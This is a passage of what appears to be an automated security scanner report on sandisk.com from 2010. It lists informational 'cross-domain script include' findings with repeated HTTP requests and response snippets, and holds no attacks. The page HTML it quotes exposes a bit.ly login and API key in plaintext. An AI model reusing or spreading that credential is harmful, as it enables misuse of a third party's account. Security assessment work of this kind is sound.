Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.30. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/corporate-responsibility/labor-and-ethics HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/corporate-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.31. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40998
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.32. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40999
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.33. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/environmental-management-system HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13522
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.34. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/facilities HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39036
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.35. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/environmental-responsibility/information-technology HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/environmental-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.36. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40374
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.37. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/chemical-disclosure HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39708
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.38. http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/corporate-social-responsibility/product-environmental-compliance/green-procurement HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/corporate-social-responsibility/product-environmental-compliance
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38735
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<div id="bannerRight" class="containerRight">
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.39. http://www.sandisk.com/about-sandisk/management  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/management HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23148
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.40. http://www.sandisk.com/about-sandisk/management/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/management/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23149
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.41. http://www.sandisk.com/about-sandisk/management/timeline-of-innovation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/management/timeline-of-innovation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/management/timeline-of-innovation HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/management
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22484
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.42. http://www.sandisk.com/about-sandisk/media-kit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20396
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.43. http://www.sandisk.com/about-sandisk/media-kit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/press-room/press-releases/2010/2010-11-04-sandisk-to-celebrate-15-years-on-the-nasdaq-with--opening-bell-ceremony
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20397
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.44. http://www.sandisk.com/about-sandisk/media-kit/business-and-industry-association-links  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/business-and-industry-association-links

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /about-sandisk/media-kit/business-and-industry-association-links HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22019
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>
   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

2.45. http://www.sandisk.com/about-sandisk/media-kit/businessoem-products-brochures  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/businessoem-products-brochures

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/businessoem-products-brochures HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28370
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.46. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/executive-officer-photos

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/executive-officer-photos HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25576
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.47. http://www.sandisk.com/about-sandisk/media-kit/executive-officer-photos.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /about-sandisk/media-kit/executive-officer-photos.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about-sandisk/media-kit/executive-officer-photos.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/about-sandisk/media-kit
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25581
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:12 GMT
Connection: close


